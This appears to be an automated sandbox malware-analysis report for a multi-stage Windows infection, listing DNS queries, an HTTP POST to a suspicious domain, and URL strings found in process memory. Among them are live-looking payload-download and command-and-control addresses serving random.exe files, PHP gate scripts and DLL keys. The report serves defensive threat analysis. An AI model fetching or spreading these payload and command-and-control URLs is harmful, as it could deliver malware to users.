"*://*.imgur.io/js/vendor.*.bundle.js", "*://www.rva311.com/static/js/main.*.chunk.js", "*://web-assets.toggl.com/app/assets/scripts/*.js", "*://libs.coremetrics.com/eluminate.js", "*://connect.facebook.net/*/sdk.js*", "*://connect.facebook.net/*/all.js*", "*://secure.cdn.fastclick.net/js/cnvr-launcher/*/launcher-stub.min.js*", "*://www.google-analytics.com/analytics.js*", "*://www.google-analytics.com/gtm/js*", "*://www.googletagmanager.com/gtm.js*", "*://www.google-analytics.com/plugins/ua/ec.js", "*://ssl.google-analytics.com/ga.js", "*://s0.2mdn.net/instream/html5/ima3.js", "*://imasdk.googleapis.com/js/sdkloader/ima3.js", "*://www.googleadservices.com/pagead/conversion_async.js", "*://www.googletagservices.com/tag/js/gpt.js*", "*://pagead2.googlesyndication.com/tag/js/gpt.js*", "*://pagead2.googlesyndication.com/gpt/pubads_impl_*.js*", "*://securepubads.g.doubleclick.net/tag/js/gpt.js*", "*://securepubads.g.doubleclick.net/gpt/pubads_impl_*.js*", "*://script.ioam.de/iam.js", "*://cdn.adsafeprotected.com/iasPET.1.js", "*://static.adsafeprotected.com/iasPET.1.js", "*://adservex.media.net/videoAds.js*", "*://*.moatads.com/*/moatad.js*", "*://*.moatads.com/*/moatapi.js*", "*://*.moatads.com/*/moatheader.js*", "*://*.moatads.com/*/yi.js*", "*://*.imrworldwide.com/v60.js", "*://cdn.optimizely.com/js/*.js", "*://cdn.optimizely.com/public/*.js", "*://id.rambler.ru/rambler-id-helper/auth_events.js", "*://media.richrelevance.com/rrserver/js/1.2/p13n.js", "*://www.gstatic.com/firebasejs/*/firebase-messaging.js*", "*://*.vidible.tv/*/vidible-min.js*", "*://vdb-cdn-files.s3.amazonaws.com/*/vidible-min.js*", "*://js.maxmind.com/js/apis/geoip2/*/geoip2.js", "*://s.webtrends.com/js/advancedLinkTracking.js", "*://s.webtrends.com/js/webtrends.js", "*://s.webtrends.com/js/webtrends.min.js"], windowId:
                          Source: global trafficDNS traffic detected: DNS query: drive-connect.cyou
                          Source: global trafficDNS traffic detected: DNS query: atten-supporse.biz
                          Source: global trafficDNS traffic detected: DNS query: prod.classify-client.prod.webservices.mozgcp.net
                          Source: global trafficDNS traffic detected: DNS query: youtube.com
                          Source: global trafficDNS traffic detected: DNS query: detectportal.firefox.com
                          Source: global trafficDNS traffic detected: DNS query: prod.detectportal.prod.cloudops.mozgcp.net
                          Source: global trafficDNS traffic detected: DNS query: contile.services.mozilla.com
                          Source: global trafficDNS traffic detected: DNS query: spocs.getpocket.com
                          Source: global trafficDNS traffic detected: DNS query: prod.balrog.prod.cloudops.mozgcp.net
                          Source: global trafficDNS traffic detected: DNS query: prod.ads.prod.webservices.mozgcp.net
                          Source: global trafficDNS traffic detected: DNS query: example.org
                          Source: global trafficDNS traffic detected: DNS query: ipv4only.arpa
                          Source: global trafficDNS traffic detected: DNS query: content-signature-2.cdn.mozilla.net
                          Source: global trafficDNS traffic detected: DNS query: prod.content-signature-chains.prod.webservices.mozgcp.net
                          Source: global trafficDNS traffic detected: DNS query: www.google.com
                          Source: global trafficDNS traffic detected: DNS query: js.monitor.azure.com
                          Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: drive-connect.cyou
                          Source: firefox.exe, 0000001D.00000002.3399505695.00000214AAD50000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://127.0.0.1:
                          Source: skotes.exe, 00000006.00000002.3482291787.000000000156A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/luma/random.exe-P
                          Source: skotes.exe, 00000006.00000002.3482291787.000000000156A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/luma/random.exe;P
                          Source: skotes.exe, 00000006.00000002.3482291787.000000000156A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/off/random.exe
                          Source: skotes.exe, 00000006.00000002.3482291787.000000000156A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/off/random.exe~Q
                          Source: skotes.exe, 00000006.00000002.3482291787.000000000156A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/steam/random.exeZP
                          Source: skotes.exe, 00000006.00000002.3482291787.000000000156A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/steam/random.exekQ
                          Source: skotes.exe, 00000006.00000002.3482291787.000000000156A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/well/random.exe
                          Source: skotes.exe, 00000006.00000002.3482291787.000000000156A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/well/random.exeGP
                          Source: skotes.exe, 00000006.00000002.3482291787.000000000156A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/well/random.exe_Q
                          Source: f570600774.exe, 0000000E.00000002.3190013417.000000000145E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206
                          Source: f570600774.exe, 0000000E.00000002.3190013417.00000000014B7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/
                          Source: f570600774.exe, 0000000E.00000002.3190013417.000000000145E000.00000004.00000020.00020000.00000000.sdmp, f570600774.exe, 0000000E.00000002.3190013417.00000000014A4000.00000004.00000020.00020000.00000000.sdmp, f570600774.exe, 0000000E.00000002.3190013417.00000000014B7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/c4becf79229cb002.php
                          Source: f570600774.exe, 0000000E.00000002.3190013417.000000000145E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/c4becf79229cb002.php/
                          Source: f570600774.exe, 0000000E.00000002.3190013417.00000000014B7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpDh
                          Source: f570600774.exe, 0000000E.00000002.3190013417.00000000014B7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpHh
                          Source: f570600774.exe, 0000000E.00000002.3190013417.00000000014A4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpgRL
                          Source: f570600774.exe, 0000000E.00000002.3190013417.00000000014B7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpph
                          Source: f570600774.exe, 0000000E.00000002.3190013417.000000000145E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206;
                          Source: skotes.exe, 00000006.00000002.3482291787.000000000156A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.43/Zu7JuNko/index.php
                          Source: skotes.exe, 00000006.00000002.3482291787.000000000156A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.43/Zu7JuNko/index.php32Z=
                          Source: skotes.exe, 00000006.00000002.3482291787.000000000156A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.43/Zu7JuNko/index.php514001
                          Source: skotes.exe, 00000006.00000002.3482291787.000000000156A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpW
                          Source: skotes.exe, 00000006.00000002.3482291787.000000000156A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpY
                          Source: skotes.exe, 00000006.00000002.3482291787.000000000156A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpded
                          Source: skotes.exe, 00000006.00000002.3482291787.0000000001551000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpe
                          Source: skotes.exe, 00000006.00000002.3482291787.000000000156A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpncodedM=
                          Source: skotes.exe, 00000006.00000002.3482291787.00000000015C4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.43/Zu7JuNko/index.php~
                          Source: skotes.exe, 00000006.00000002.3482291787.000000000156A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.43/erences.SourceAumid001p
                          Source: skotes.exe, 00000006.00000002.3482291787.0000000001551000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://31.41.244.11/files/random.exe
                          Source: skotes.exe, 00000006.00000002.3482291787.0000000001551000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://31.41.244.11/files/random.exe)
                          Source: skotes.exe, 00000006.00000002.3482291787.0000000001551000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://31.41.244.11/files/random.exe506238476
                          Source: skotes.exe, 00000006.00000002.3482291787.0000000001551000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://31.41.244.11/files/random.exe5062384ed
                          Source: skotes.exe, 00000006.00000002.3482291787.0000000001551000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://31.41.244.11/files/random.exeV
                          Source: skotes.exe, 00000006.00000002.3482291787.000000000156A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://31.41.244.11/files/unique2/random.exe
                          Source: f30149f036.exe, 0000000C.00000003.3357704236.00000000055C1000.00000004.00000020.00020000.00000000.sdmp, f30149f036.exe, 0000000C.00000003.3248884803.00000000055C1000.00000004.00000020.00020000.00000000.sdmp, f30149f036.exe, 0000000C.00000002.3488485448.00000000055C2000.00000004.00000020.00020000.00000000.sdmp, f30149f036.exe, 0000000C.00000003.3276392844.00000000055C1000.00000004.00000020.00020000.00000000.sdmp, f30149f036.exe, 0000000C.00000003.3304496353.00000000055C1000.00000004.00000020.00020000.00000000.sdmp, f30149f036.exe, 0000000C.00000003.3220567786.00000000055C1000.00000004.00000020.00020000.00000000.sdmp, f30149f036.exe, 0000000C.00000003.3331502987.00000000055C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://80.82.65.70/
                          Source: f30149f036.exe, 0000000C.00000003.3357704236.00000000055C1000.00000004.00000020.00020000.00000000.sdmp, f30149f036.exe, 0000000C.00000003.3248884803.00000000055C1000.00000004.00000020.00020000.00000000.sdmp, f30149f036.exe, 0000000C.00000002.3488485448.00000000055C2000.00000004.00000020.00020000.00000000.sdmp, f30149f036.exe, 0000000C.00000003.3276392844.00000000055C1000.00000004.00000020.00020000.00000000.sdmp, f30149f036.exe, 0000000C.00000003.3304496353.00000000055C1000.00000004.00000020.00020000.00000000.sdmp, f30149f036.exe, 0000000C.00000003.3220567786.00000000055C1000.00000004.00000020.00020000.00000000.sdmp, f30149f036.exe, 0000000C.00000003.3331502987.00000000055C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://80.82.65.70/P
                          Source: f30149f036.exe, 0000000C.00000003.3357704236.00000000055C1000.00000004.00000020.00020000.00000000.sdmp, f30149f036.exe, 0000000C.00000003.3248884803.00000000055C1000.00000004.00000020.00020000.00000000.sdmp, f30149f036.exe, 0000000C.00000002.3488485448.00000000055C2000.00000004.00000020.00020000.00000000.sdmp, f30149f036.exe, 0000000C.00000003.3276392844.00000000055C1000.00000004.00000020.00020000.00000000.sdmp, f30149f036.exe, 0000000C.00000003.3304496353.00000000055C1000.00000004.00000020.00020000.00000000.sdmp, f30149f036.exe, 0000000C.00000003.3220567786.00000000055C1000.00000004.00000020.00020000.00000000.sdmp, f30149f036.exe, 0000000C.00000003.3331502987.00000000055C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://80.82.65.70/add?substr=mixtwo&s=three&sub=emp
                          Source: f30149f036.exe, 0000000C.00000002.3479111946.0000000001018000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://80.82.65.70/dll/download
                          Source: f30149f036.exe, 0000000C.00000003.3248884803.00000000055CF000.00000004.00000020.00020000.00000000.sdmp, f30149f036.exe, 0000000C.00000003.3357704236.00000000055CF000.00000004.00000020.00020000.00000000.sdmp, f30149f036.exe, 0000000C.00000003.3304496353.00000000055CF000.00000004.00000020.00020000.00000000.sdmp, f30149f036.exe, 0000000C.00000002.3488485448.00000000055CF000.00000004.00000020.00020000.00000000.sdmp, f30149f036.exe, 0000000C.00000003.3220567786.00000000055CF000.00000004.00000020.00020000.00000000.sdmp, f30149f036.exe, 0000000C.00000003.3331502987.00000000055CF000.00000004.00000020.00020000.00000000.sdmp, f30149f036.exe, 0000000C.00000003.3276392844.00000000055CF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://80.82.65.70/dll/downloadt
                          Source: f30149f036.exe, 0000000C.00000003.3331502987.00000000055C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://80.82.65.70/dll/key
                          Source: f30149f036.exe, 0000000C.00000002.3479111946.0000000001005000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://80.82.65.70/dll/keyn6
                          Source: f30149f036.exe, 0000000C.00000003.3331502987.00000000055C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://80.82.65.70/files/download
                          Source: f30149f036.exe, 0000000C.00000002.3479111946.0000000000F69000.00000004.00000020.00020000.00000000.sdmp, f30149f036.exe, 0000000C.00000002.3488485448.00000000055CF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://80.82.65.70/files/download0/files/download
                          Source: f30149f036.exe, 0000000C.00000002.3488485448.00000000055CF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://80.82.65.70/files/download0/files/downloadX
                          Source: f30149f036.exe, 0000000C.00000003.3357704236.00000000055CF000.00000004.00000020.00020000.00000000.sdmp, f30149f036.exe, 0000000C.00000002.3488485448.00000000055CF000.00000004.00000020.00020000.00000000.sdmp, f30149f036.exe, 0000000C.00000003.3331502987.00000000055CF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://80.82.65.70/files/download8
                          Source: f30149f036.exe, 0000000C.00000002.3479111946.0000000000F69000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://80.82.65.70/files/downloadD
                          Source: f30149f036.exe, 0000000C.00000003.3357704236.00000000055CF000.00000004.00000020.00020000.00000000.sdmp, f30149f036.exe, 0000000C.00000002.3488485448.00000000055CF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://80.82.65.70/files/downloadF
                          Source: f30149f036.exe, 0000000C.00000002.3488485448.00000000055CF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://80.82.65.70/files/downloadb
                          Source: f30149f036.exe, 0000000C.00000003.3357704236.00000000055CF000.00000004.00000020.00020000.00000000.sdmp, f30149f036.exe, 0000000C.00000003.3304496353.00000000055CF000.00000004.00000020.00020000.00000000.sdmp, f30149f036.exe, 0000000C.00000002.3488485448.00000000055CF000.00000004.00000020.00020000.00000000.sdmp, f30149f036.exe, 0000000C.00000003.3331502987.00000000055CF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://80.82.65.70/files/downloadfaults
                          Source: f30149f036.exe, 0000000C.00000002.3479111946.0000000000F69000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://80.82.65.70/files/downloadl
                          Source: f30149f036.exe, 0000000C.00000002.3479111946.0000000000F69000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://80.82.65.70/files/downloadlZ
                          Source: f30149f036.exe, 0000000C.00000002.3488485448.00000000055CF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://80.82.65.70/files/downloadp
                          Source: firefox.exe, 0000001D.00000002.3408991340.00000214ABF17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://a9.com/-/spec/opensearch/1.0/
                          Source: firefox.exe, 0000001D.00000002.3408991340.00000214ABF17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://a9.com/-/spec/opensearch/1.1/
                          Source: firefox.exe, 0000001D.00000002.3408991340.00000214ABF17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://a9.com/-/spec/opensearchdescription/1.0/
                          Source: firefox.exe, 0000001D.00000002.3408991340.00000214ABF17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://a9.com/-/spec/opensearchdescription/1.1/
                          Source: d0d9725343.exe, 0000000B.00000003.2953198122.00000000038BD000.00000004.00000800.00020000.00000000.sdmp, 176986cc9c.exe, 0000000D.00000003.3165168016.000000000586F000.00000004.00000800.00020000.00000000.sdmp, 176986cc9c.exe, 0000000F.00000003.3314092869.0000000005414000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3412078877.00000214AC441000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
                          Source: d0d9725343.exe, 0000000B.00000003.2953198122.00000000038BD000.00000004.00000800.00020000.00000000.sdmp, 176986cc9c.exe, 0000000D.00000003.3165168016.000000000586F000.00000004.00000800.00020000.00000000.sdmp, 176986cc9c.exe, 0000000F.00000003.3314092869.0000000005414000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3412078877.00000214AC441000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
                          Source: firefox.exe, 0000001D.00000002.3385444273.00000214A7B73000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://compose.mail.yahoo.co.jp/ym/Compose?To=%s
                          Source: firefox.exe, 0000001D.00000002.3397502544.00000214A93AF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://compose.mail.yahoo.co.jp/ym/Compose?To=%ss
                          Source: d0d9725343.exe, 0000000B.00000003.2953198122.00000000038BD000.00000004.00000800.00020000.00000000.sdmp, 176986cc9c.exe, 0000000D.00000003.3165168016.000000000586F000.00000004.00000800.00020000.00000000.sdmp, 176986cc9c.exe, 0000000F.00000003.3314092869.0000000005414000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3412078877.00000214AC441000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
                          Source: d0d9725343.exe, 0000000B.00000003.2953198122.00000000038BD000.00000004.00000800.00020000.00000000.sdmp, 176986cc9c.exe, 0000000D.00000003.3165168016.000000000586F000.00000004.00000800.00020000.00000000.sdmp, 176986cc9c.exe, 0000000F.00000003.3314092869.0000000005414000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3412078877.00000214AC441000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
                          Source: d0d9725343.exe, 0000000B.00000003.2953198122.00000000038BD000.00000004.00000800.00020000.00000000.sdmp, 176986cc9c.exe, 0000000D.00000003.3165168016.000000000586F000.00000004.00000800.00020000.00000000.sdmp, 176986cc9c.exe, 0000000F.00000003.3314092869.0000000005414000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3412078877.00000214AC441000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
                          Source: d0d9725343.exe, 0000000B.00000003.2953198122.00000000038BD000.00000004.00000800.00020000.00000000.sdmp, 176986cc9c.exe, 0000000D.00000003.3165168016.000000000586F000.00000004.00000800.00020000.00000000.sdmp, 176986cc9c.exe, 0000000F.00000003.3314092869.0000000005414000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3412078877.00000214AC441000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
                          Source: d0d9725343.exe, 0000000B.00000003.2953198122.00000000038BD000.00000004.00000800.00020000.00000000.sdmp, 176986cc9c.exe, 0000000D.00000003.3165168016.000000000586F000.00000004.00000800.00020000.00000000.sdmp, 176986cc9c.exe, 0000000F.00000003.3314092869.0000000005414000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3412078877.00000214AC441000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
                          Source: firefox.exe, 0000001D.00000002.3414473910.00000214AC854000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://detectportal.firefox.com
                          Source: firefox.exe, 0000001D.00000002.3385444273.00000214A7BE2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3442157921.00000214B3B6D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://detectportal.firefox.com/canonical.html
                          Source: firefox.exe, 0000001D.00000002.3414473910.00000214AC811000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://detectportal.firefox.com/success.txt?ipv4
                          Source: firefox.exe, 0000001D.00000002.3414473910.00000214AC854000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://detectportal.firefox.com/success.txt?ipv6
                          Source: firefox.exe, 0000001D.00000003.3359809610.00000214B3C16000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://developer.mozilla.org/en/docs/DOM:element.addEventListener
                          Source: firefox.exe, 0000001D.00000003.3359809610.00000214B3C16000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://developer.mozilla.org/en/docs/DOM:element.removeEventListener
                          Source: firefox.exe, 0000001D.00000002.3380329645.00000214A6D61000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://exslt.org/dates-and-timesD
                          Source: firefox.exe, 0000001D.00000002.3380329645.00000214A6D61000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://exslt.org/regular-expressions
                          Source: firefox.exe, 0000001D.00000002.3389826733.00000214A7C00000.00000002.00000001.00040000.0000001B.sdmpString found in binary or memory: http://fb.me/use-check-prop-types
                          Source: firefox.exe, 0000001D.00000002.3389826733.00000214A7C00000.00000002.00000001.00040000.0000001B.sdmpString found in binary or memory: http://fb.me/use-check-prop-typesG
                          Source: firefox.exe, 0000001D.00000002.3414473910.00000214AC854000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3408991340.00000214ABF17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://json-schema.org/draft-04/schema#
                          Source: firefox.exe, 0000001D.00000002.3414473910.00000214AC854000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3408991340.00000214ABF17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://json-schema.org/draft-06/schema#
                          Source: firefox.exe, 0000001D.00000002.3408991340.00000214ABF17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://json-schema.org/draft-07/schema#
                          Source: firefox.exe, 0000001D.00000002.3414473910.00000214AC854000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://json-schema.org/draft-07/schema#-
                          Source: firefox.exe, 0000001D.00000002.3408991340.00000214ABF17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mozilla.org
                          Source: firefox.exe, 0000001D.00000003.3282828733.00000214AB295000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3431199683.00000214AF1AA000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3434823097.00000214AF443000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3426975852.00000214AEC23000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3425023618.00000214AE2BB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3422411758.00000214ADCB7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3443577003.00000214B3C97000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3381157977.00000214A6EE3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3419739637.00000214ACE20000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.3282828733.00000214AB279000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3397502544.00000214A9337000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3400141987.00000214AAED2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.3271184161.00000214AB5E1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3426975852.00000214AEC37000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3433552608.00000214AF36D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3425023618.00000214AE220000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3434823097.00000214AF491000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3422411758.00000214ADC03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.3285577031.00000214AAEDC000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.3281764562.00000214AAECF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3406016346.00000214ABB7B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mozilla.org/MPL/2.0/.
                          Source: d0d9725343.exe, 0000000B.00000003.2953198122.00000000038BD000.00000004.00000800.00020000.00000000.sdmp, 176986cc9c.exe, 0000000D.00000003.3165168016.000000000586F000.00000004.00000800.00020000.00000000.sdmp, 176986cc9c.exe, 0000000F.00000003.3314092869.0000000005414000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3412078877.00000214AC441000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
                          Source: d0d9725343.exe, 0000000B.00000003.2953198122.00000000038BD000.00000004.00000800.00020000.00000000.sdmp, 176986cc9c.exe, 0000000D.00000003.3165168016.000000000586F000.00000004.00000800.00020000.00000000.sdmp, 176986cc9c.exe, 0000000F.00000003.3314092869.0000000005414000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3412078877.00000214AC441000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
                          Source: firefox.exe, 0000001D.00000002.3385444273.00000214A7B73000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://poczta.interia.pl/mh/?mailto=%s
                          Source: firefox.exe, 0000001D.00000002.3397502544.00000214A93AF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://poczta.interia.pl/mh/?mailto=%sw
                          Source: firefox.exe, 0000001D.00000002.3434823097.00000214AF403000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3426975852.00000214AEC4D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://r3.i.lencr.org/0W
                          Source: firefox.exe, 0000001D.00000002.3434823097.00000214AF403000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3426975852.00000214AEC4D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://r3.o.lencr.org0
                          Source: firefox.exe, 0000001D.00000002.3389826733.00000214A7C00000.00000002.00000001.00040000.0000001B.sdmpString found in binary or memory: http://stackoverflow.com/questions/30030031)
                          Source: firefox.exe, 0000001D.00000002.3385444273.00000214A7B73000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://win.mail.ru/cgi-bin/sentmsg?mailto=%s
                          Source: firefox.exe, 0000001D.00000002.3397502544.00000214A93AF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://win.mail.ru/cgi-bin/sentmsg?mailto=%sy
                          Source: firefox.exe, 0000001D.00000002.3385444273.00000214A7B73000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.inbox.lv/rfc2368/?value=%s
                          Source: firefox.exe, 0000001D.00000002.3385444273.00000214A7B73000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.inbox.lv/rfc2368/?value=%shandlerSvc
                          Source: firefox.exe, 0000001D.00000002.3397502544.00000214A93AF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.inbox.lv/rfc2368/?value=%su
                          Source: firefox.exe, 0000001D.00000002.3408991340.00000214ABF17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.mozilla.org/2005/app-update
                          Source: firefox.exe, 0000001D.00000002.3408991340.00000214ABF17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.mozilla.org/2005/app-updateBITS_IDLE_NO_PROGRESS_TIMEOUT_SECSSERVICE_NOT_ENOUGH_COMMAND_L
                          Source: firefox.exe, 0000001D.00000002.3447537019.00000214B5D38000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.mozilla.org/2005/app-updatex
                          Source: firefox.exe, 0000001D.00000002.3408991340.00000214ABF17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.mozilla.org/2006/browser/search/
                          Source: firefox.exe, 0000001D.00000002.3404937712.00000214AB803000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3408991340.00000214ABF17000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3420072274.00000214AD868000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3406016346.00000214ABB5D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.3317641255.00000214ADDDE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xul
